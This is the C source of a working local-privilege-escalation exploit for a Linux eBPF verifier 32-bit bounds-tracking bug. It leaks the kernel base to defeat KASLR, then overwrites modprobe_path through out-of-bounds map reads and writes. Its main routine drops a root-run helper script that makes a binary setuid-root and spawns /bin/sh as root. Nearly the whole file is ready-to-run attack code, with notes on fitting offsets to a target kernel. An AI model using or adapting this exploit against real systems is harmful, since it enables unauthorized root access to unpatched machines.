/*
 * PoC local-privilege-escalation exploit for an eBPF verifier 32-bit ALU
 * bounds-tracking bug (CVE-2017-16995 family): the verifier mistracks
 * 32-bit immediates/ops, so a value that is 0xffff'ffff (and, after +1
 * and >>32, exactly 1) at runtime is treated as a known constant 0.
 * That lets a program compute `map_value - 0x48` while the verifier
 * believes the pointer is still in bounds.
 *
 * Stage 1 (get_kern_base):  OOB-read the qword 0x48 bytes before an
 *   array map's value area — presumably the map's ops pointer
 *   (&array_map_ops) — and subtract the known image offset to derive
 *   the KASLR slide.
 * Stage 2 (write_modprobe_path):  OOB-write the same slot with
 *   &array_of_map_ops.  An array-of-maps lookup dereferences the value
 *   stored in the element, so subsequent lookups hand the program
 *   writable pointers to attacker-chosen kernel addresses; the program
 *   then writes "/tmp/x" over modprobe_path.  Executing an unknown
 *   binary format (/tmp/dummy) makes the kernel run /tmp/x as root.
 *
 * NOTE(review): ARRAY_MAP_OPS / MODPROBE_PATH / ARRAY_OF_MAP_OPS are
 * offsets for ONE specific kernel build — confirm against the target's
 * System.map before use.  Only works on kernels with the verifier bug.
 */
#define _GNU_SOURCE
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <linux/bpf.h>

/* Build-specific kernel-image offsets (taken from the target's System.map). */
#define ARRAY_MAP_OPS    10591360
#define MODPROBE_PATH    14943648
#define ARRAY_OF_MAP_OPS 10590880

/* start from kernel — instruction-encoding helpers copied from
 * tools/include/linux/filter.h (not exported by the uapi headers). */
#define BPF_EMIT_CALL(FUNC)                     \
    ((struct bpf_insn) {                        \
        .code  = BPF_JMP | BPF_CALL,            \
        .dst_reg = 0,                           \
        .src_reg = 0,                           \
        .off   = 0,                             \
        .imm   = (FUNC) })

#define BPF_MOV32_IMM(DST, IMM)                 \
    ((struct bpf_insn) {                        \
        .code  = BPF_ALU | BPF_MOV | BPF_K,     \
        .dst_reg = DST,                         \
        .src_reg = 0,                           \
        .off   = 0,                             \
        .imm   = IMM })

#define BPF_REG_ARG1 BPF_REG_1
#define BPF_REG_ARG2 BPF_REG_2
#define BPF_REG_ARG3 BPF_REG_3
#define BPF_REG_ARG4 BPF_REG_4
#define BPF_REG_ARG5 BPF_REG_5
#define BPF_PSEUDO_MAP_FD 1

/* 16-byte (two-insn) load of a 64-bit immediate; src_reg selects the
 * pseudo relocation type (BPF_PSEUDO_MAP_FD turns the imm into a map ptr). */
#define BPF_LD_IMM64_RAW(DST, SRC, IMM)         \
    ((struct bpf_insn) {                        \
        .code  = BPF_LD | BPF_DW | BPF_IMM,     \
        .dst_reg = DST,                         \
        .src_reg = SRC,                         \
        .off   = 0,                             \
        .imm   = (__u32) (IMM) }),              \
    ((struct bpf_insn) {                        \
        .code  = 0, /* zero is reserved opcode */ \
        .dst_reg = 0,                           \
        .src_reg = 0,                           \
        .off   = 0,                             \
        .imm   = ((__u64) (IMM)) >> 32 })

#define BPF_ALU32_IMM(OP, DST, IMM)             \
    ((struct bpf_insn) {                        \
        .code  = BPF_ALU | BPF_OP(OP) | BPF_K,  \
        .dst_reg = DST,                         \
        .src_reg = 0,                           \
        .off   = 0,                             \
        .imm   = IMM })

#define BPF_LD_MAP_FD(DST, MAP_FD)              \
    BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)

#define BPF_ALU32_REG(OP, DST, SRC)             \
    ((struct bpf_insn) {                        \
        .code  = BPF_ALU | BPF_OP(OP) | BPF_X,  \
        .dst_reg = DST,                         \
        .src_reg = SRC,                         \
        .off   = 0,                             \
        .imm   = 0 })

#define BPF_EXIT_INSN()                         \
    ((struct bpf_insn) {                        \
        .code  = BPF_JMP | BPF_EXIT,            \
        .dst_reg = 0,                           \
        .src_reg = 0,                           \
        .off   = 0,                             \
        .imm   = 0 })

/* Memory store, *(uint *) (dst_reg + off16) = src_reg */
#define BPF_STX_MEM(SIZE, DST, SRC, OFF)        \
    ((struct bpf_insn) {                        \
        .code  = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \
        .dst_reg = DST,                         \
        .src_reg = SRC,                         \
        .off   = OFF,                           \
        .imm   = 0 })

#define BPF_REG_FP BPF_REG_10

/* NOTE: the original file defined BPF_MOV64_REG twice (identical bodies);
 * the duplicate has been removed. */
#define BPF_MOV64_REG(DST, SRC)                 \
    ((struct bpf_insn) {                        \
        .code  = BPF_ALU64 | BPF_MOV | BPF_X,   \
        .dst_reg = DST,                         \
        .src_reg = SRC,                         \
        .off   = 0,                             \
        .imm   = 0 })

#define BPF_ALU64_IMM(OP, DST, IMM)             \
    ((struct bpf_insn) {                        \
        .code  = BPF_ALU64 | BPF_OP(OP) | BPF_K, \
        .dst_reg = DST,                         \
        .src_reg = 0,                           \
        .off   = 0,                             \
        .imm   = IMM })

#define BPF_REG_TMP BPF_REG_8

#define BPF_LDX_MEM(SIZE, DST, SRC, OFF)        \
    ((struct bpf_insn) {                        \
        .code  = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \
        .dst_reg = DST,                         \
        .src_reg = SRC,                         \
        .off   = OFF,                           \
        .imm   = 0 })

#define BPF_JMP_IMM(OP, DST, IMM, OFF)          \
    ((struct bpf_insn) {                        \
        .code  = BPF_JMP | BPF_OP(OP) | BPF_K,  \
        .dst_reg = DST,                         \
        .src_reg = 0,                           \
        .off   = OFF,                           \
        .imm   = IMM })

#define BPF_MOV64_IMM(DST, IMM)                 \
    ((struct bpf_insn) {                        \
        .code  = BPF_ALU64 | BPF_MOV | BPF_K,   \
        .dst_reg = DST,                         \
        .src_reg = 0,                           \
        .off   = 0,                             \
        .imm   = IMM })

#define BPF_ALU64_REG(OP, DST, SRC)             \
    ((struct bpf_insn) {                        \
        .code  = BPF_ALU64 | BPF_OP(OP) | BPF_X, \
        .dst_reg = DST,                         \
        .src_reg = SRC,                         \
        .off   = 0,                             \
        .imm   = 0 })

#define BPF_MOV32_REG(DST, SRC)                 \
    ((struct bpf_insn) {                        \
        .code  = BPF_ALU | BPF_MOV | BPF_X,     \
        .dst_reg = DST,                         \
        .src_reg = SRC,                         \
        .off   = 0,                             \
        .imm   = 0 })
/* end from kernel */

/* KASLR slide of the running kernel, filled in by get_kern_base(). */
unsigned long kern_base = 0;

/* Thin wrapper around the raw bpf(2) syscall. */
int bpf_(int cmd, union bpf_attr *attrs)
{
    return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

/* Read map element `key` from `mapfd` into `value` (value_size bytes).
 * Exits the process on failure. */
void array_get(int mapfd, uint32_t key, void *value)
{
    union bpf_attr attr = {
        .map_fd = mapfd,
        .key    = (uint64_t)&key,
        .value  = (uint64_t)value,
    };

    int res = bpf_(BPF_MAP_LOOKUP_ELEM, &attr);
    if (res)
        err(1, "map lookup elem");  /* was mislabeled "map update elem" */
}

/* Store the 8-byte `value` at map element `key`.  Exits on failure. */
void array_set(int mapfd, uint32_t key, uint64_t value)
{
    union bpf_attr attr = {
        .map_fd = mapfd,
        .key    = (uint64_t)&key,
        .value  = (uint64_t)&value,
        .flags  = BPF_ANY,
    };

    int res = bpf_(BPF_MAP_UPDATE_ELEM, &attr);
    if (res)
        err(1, "map update elem");
}

/* Load `insns` as a socket filter and trigger it once by sending a packet
 * through an AF_UNIX socketpair.  Returns the write side of a second pair
 * with the program still attached (so it can be triggered again), or 1 if
 * the verifier rejected the program (log dumped to stdout). */
int run_bpf_code(int mapfd, struct bpf_insn *insns, unsigned int cnt)
{
    char verifier_log[100000];
    union bpf_attr create_prog_attrs = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insn_cnt  = cnt,
        .insns     = (uint64_t)insns,
        .license   = (uint64_t)"",
        .log_level = 2,
        .log_size  = sizeof(verifier_log),
        .log_buf   = (uint64_t)verifier_log
    };

    int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);
    if (progfd == -1) {
        perror("prog load");
        puts(verifier_log);
        return 1;
    }

    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))
        err(1, "socketpair");
    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))
        err(1, "setsockopt");
    /* One 2-byte datagram is enough to run the filter once. */
    if (write(socks[1], "aa", 2) != 2)
        err(1, "write");

    int socks2[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks2))
        err(1, "socketpair");
    if (setsockopt(socks2[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))
        err(1, "setsockopt");

    return socks2[1];
}

/* Stage 1: leak the qword 0x48 bytes before a map value (the map's ops
 * pointer, presumably &array_map_ops — confirm against the target struct
 * layout) into element 0, then subtract the image offset to get the slide. */
unsigned long get_kern_base(void)
{
    union bpf_attr create_map_attrs = {
        .map_type    = BPF_MAP_TYPE_ARRAY,
        .key_size    = 4,
        .value_size  = 16,
        .max_entries = 16
    };
    int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);
    if (mapfd == -1)
        err(1, "map create");

    array_set(mapfd, 1, 2);

    struct bpf_insn insns[] = {
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        // fill r0 with pointer to map value
        BPF_MOV64_REG(BPF_REG_TMP, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_TMP, -4), // allocate 4 bytes stack
        BPF_MOV32_IMM(BPF_REG_ARG2, 0),
        BPF_STX_MEM(BPF_W, BPF_REG_TMP, BPF_REG_ARG2, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_TMP),
        BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, 0), // prepare exit (was MOV64_REG typo)
        BPF_EXIT_INSN(),             // exit

        /* Verifier-confusion gadget: at runtime r2 becomes 0xffff'ffff,
         * +1 = 0x1'0000'0000, >>32 = 1, *0x48 = 0x48; the verifier
         * mistracks the 32-bit mov and believes r2 stays 0. */
        BPF_MOV64_IMM(BPF_REG_1, 0x0),
        BPF_MOV32_IMM(BPF_REG_2, 0xffffffff),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1),
        BPF_ALU64_IMM(BPF_RSH, BPF_REG_2, 32),
        BPF_ALU64_IMM(BPF_MUL, BPF_REG_2, 0x48),
        BPF_ALU64_REG(BPF_SUB, BPF_REG_1, BPF_REG_2), // r1 = -0x48 at runtime, "0" to verifier
        BPF_MOV64_REG(BPF_REG_3, BPF_REG_0),
        BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1), // OOB ptr: value - 0x48
        BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_0, 0), // leak map->ops
        BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_2, 0), // stash in value[0]
        BPF_MOV32_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN()
    };
    run_bpf_code(mapfd, insns, sizeof(insns) / sizeof(insns[0]));

    unsigned long val2[2] = { 0, 0 };
    array_get(mapfd, 0, val2);
    printf("leak %p\n", (void *)val2[0]);

    return val2[0] - ARRAY_MAP_OPS;
}

/* Stage 2: swap the map's ops to array-of-maps ops, so lookups return the
 * pointer STORED in each element; store modprobe_path (+0 and +4) in
 * elements 0/1, then write "/tmp/x\0\0" over modprobe_path. */
unsigned long write_modprobe_path(void)
{
    union bpf_attr create_map_attrs = {
        .map_type    = BPF_MAP_TYPE_ARRAY,
        .key_size    = 4,
        .value_size  = 16,
        .max_entries = 16
    };
    int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);
    if (mapfd == -1)
        err(1, "map create");
    int mapfd2 = bpf_(BPF_MAP_CREATE, &create_map_attrs);
    if (mapfd2 == -1)
        err(1, "map create");

    array_set(mapfd, 0, kern_base + MODPROBE_PATH);
    array_set(mapfd, 1, kern_base + MODPROBE_PATH + 4);
    printf("writing modprobe_path @ %p with %s\n",
           (void *)(kern_base + MODPROBE_PATH), "/tmp/x");

    struct bpf_insn insns[] = {
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        // fill r0 with pointer to map value
        BPF_MOV64_REG(BPF_REG_TMP, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_TMP, -4), // allocate 4 bytes stack
        BPF_MOV32_IMM(BPF_REG_ARG2, 0),
        BPF_STX_MEM(BPF_W, BPF_REG_TMP, BPF_REG_ARG2, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_TMP),
        BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, 0), // prepare exit (was MOV64_REG typo)
        BPF_EXIT_INSN(),             // exit

        /* Same verifier-confusion gadget as in get_kern_base(). */
        BPF_MOV64_IMM(BPF_REG_1, 0x0),
        BPF_MOV32_IMM(BPF_REG_2, 0xffffffff),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1),
        BPF_ALU64_IMM(BPF_RSH, BPF_REG_2, 32),
        BPF_ALU64_IMM(BPF_MUL, BPF_REG_2, 0x48),
        BPF_ALU64_REG(BPF_SUB, BPF_REG_1, BPF_REG_2),
        BPF_MOV64_REG(BPF_REG_3, BPF_REG_0),
        BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1), // OOB ptr: value - 0x48
        BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_0, 0),
        /* 32-bit imm sign-extends; works because kernel text addresses are
         * 0xffffffffXXXXXXXX with bit 31 of the low dword set. */
        BPF_MOV64_IMM(BPF_REG_2, kern_base + ARRAY_OF_MAP_OPS),
        BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_2, 0), // map->ops = array_of_map_ops
        BPF_MOV64_REG(BPF_REG_4, BPF_REG_0),

        /* Lookup key 0 now yields a pointer to modprobe_path; write "/tmp". */
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        BPF_MOV64_REG(BPF_REG_TMP, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_TMP, -4),
        BPF_MOV32_IMM(BPF_REG_ARG2, 0),
        BPF_STX_MEM(BPF_W, BPF_REG_TMP, BPF_REG_ARG2, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_TMP),
        BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, 0), // prepare exit (was MOV64_REG typo)
        BPF_EXIT_INSN(),             // exit
        BPF_MOV64_IMM(BPF_REG_1, 0x706d742f), // "/tmp" little-endian
        BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_1, 0),

        /* Lookup key 1 yields modprobe_path+4; write "/x\0\0...". */
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        BPF_MOV64_REG(BPF_REG_TMP, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_TMP, -4),
        BPF_MOV32_IMM(BPF_REG_ARG2, 1),
        BPF_STX_MEM(BPF_W, BPF_REG_TMP, BPF_REG_ARG2, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_TMP),
        BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, 0), // prepare exit (was MOV64_REG typo)
        BPF_EXIT_INSN(),             // exit
        BPF_MOV64_IMM(BPF_REG_1, 0x782f), // "/x" little-endian
        BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_1, 0),

        BPF_MOV32_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN()
    };
    run_bpf_code(mapfd, insns, sizeof(insns) / sizeof(insns[0]));
    return 0;
}

/* Create/truncate `filename` and write `content` into it.
 * Best-effort: logs and returns on failure, short writes not retried. */
void write_file(char *filename, char *content)
{
    /* O_CREAT requires a mode argument; omitting it (as the original did)
     * is undefined behavior and yields garbage permissions. */
    int fd = open(filename, O_RDWR | O_CREAT, 0755);
    if (fd < 0) {
        fprintf(stderr, "invalid open\n");
        return;
    }
    write(fd, content, strlen(content));
    close(fd);
}

int main(void)
{
    /* If we are already root (e.g. re-run after the suid grant), shell out. */
    setuid(0);
    if (getuid() == 0)
        system("/bin/sh");

    system("rm /tmp/dummy 2>/dev/null");
    system("rm /tmp/x 2>/dev/null");
    /* /tmp/x is what the kernel will execute as the modprobe helper. */
    write_file("/tmp/x",
               "#!/bin/sh\n/bin/chown root:root /home/user/crasher\n"
               "/bin/chmod u+s /home/user/crasher");
    system("chmod 755 /tmp/x");
    /* /tmp/dummy has an unknown magic so exec falls back to modprobe. */
    write_file("/tmp/dummy", "\xff\xff\xff\xff");
    system("chmod 755 /tmp/dummy");

    kern_base = get_kern_base();
    printf("got kernel base leak: %p\n", (void *)kern_base);
    write_modprobe_path();

    system("/tmp/dummy 2>/dev/null"); // trigger modprobe → runs /tmp/x as root
    system("/home/user/crasher");     // now setuid-root
    getchar();
    return 0;
}